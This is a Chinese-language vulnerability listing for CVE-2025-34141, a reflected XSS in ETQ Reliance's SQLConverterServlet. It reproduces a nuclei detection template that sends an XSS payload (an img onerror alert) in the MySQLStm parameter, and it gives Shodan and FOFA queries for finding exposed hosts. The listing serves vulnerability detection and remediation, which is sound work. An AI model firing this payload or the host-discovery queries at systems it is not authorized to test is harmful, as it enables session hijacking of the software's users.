ETQ Reliance Reflected XSS via SQLConverterServlet Vulnerability

漏洞信息

漏洞名称: ETQ Reliance Reflected XSS via SQLConverterServlet Vulnerability

漏洞编号:

  • CVE: CVE-2025-34141

漏洞类型: 跨站可执行脚本

漏洞等级: 中危

漏洞描述: ETQ Reliance是一款企业级的质量管理软件,广泛应用于制造业和服务业中,用于跟踪和管理质量流程。该软件的CG(legacy)平台中的SQLConverterServlet组件存在反射型跨站脚本(XSS)漏洞。此漏洞的根源在于SQLConverterServlet组件对用户输入的处理不当,未能正确过滤或转义恶意脚本。攻击者可以通过构造特制的链接,诱使用户点击,从而在用户的浏览器会话中执行任意JavaScript代码。由于漏洞需要用户交互才能触发,因此其利用复杂度较高。成功利用此漏洞的攻击者可以执行会话劫持或进行未授权的操作,但不会直接影响系统的可用性。该漏洞在ETQ Reliance版本SE.2025.1中已被修复,建议用户升级至此版本或更高版本以避免潜在的安全风险。

产品厂商: etq

产品名称: reliance

影响版本: * < SE.2025.1

搜索语法: html:”ETQ Reliance”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/c53b5833df8ef3c659312004bb14ffc5279b5eec/http%2Fcves%2F2025%2FCVE-2025-34141.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69

id: CVE-2025-34141

info:
  name: ETQ Reliance - Reflected XSS via SQLConverterServlet
  author: slcyber,pdresearch
  severity: medium
  description: |
    A reflected cross-site scripting (XSS) vulnerability exists in ETQ Reliance CG (legacy) platform within the SQLConverterServlet component. This vulnerability requires user interaction, such as clicking a crafted link, and may result in execution of unauthorized scripts in the user's context. The affected servlet was unnecessarily exposed to authenticated users and has since been disabled in version SE.2025.1.
  impact: |
    Successful exploitation allows attackers to execute arbitrary JavaScript in the context of an authenticated user's browser session, potentially leading to session hijacking or unauthorized actions.
  remediation: |
    Upgrade to ETQ Reliance version SE.2025.1 or later where the SQLConverterServlet has been disabled.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34141
    - https://slcyber.io/assetnote-security-research-center/how-we-accidentally-discovered-a-remote-code-execution-vulnerability-in-etq-reliance/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-34141
    cwe-id: CWE-79
    cpe: cpe:2.3:a:etq:reliance:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: etq
    product: reliance
    shodan-query: 'html:"ETQ Reliance"'
    fofa-query: 'body="ETQ Reliance"'
  tags: cve,cve2025,etq,reliance,xss,reflected-xss

flow: |
  http(1)
  if(template.path){
   http(2)
  } else {
   set("path","reliance")
   http(2)
  }

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: header
        internal: true
        name: path
        group: 1
        regex:
          - 'Location: https?://.*?/(.*?)/'

  - raw:
      - |
        GET /reliance/SQLConverterServlet?MySQLStm=%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - '</textarea><img src=x onerror=alert(document.domain)>'
          - 'You have to start the ENGINE application before using this form.'
        condition: and


Github Poc
#projectdiscovery/nuclei-templates:github issues #跨站可执行脚本
ETQ Reliance Reflected XSS via SQLConverterServlet Vulnerability
http://example.com/2025/07/23/github_3457363991/
作者
lianccc
发布于
2025年7月23日
许可协议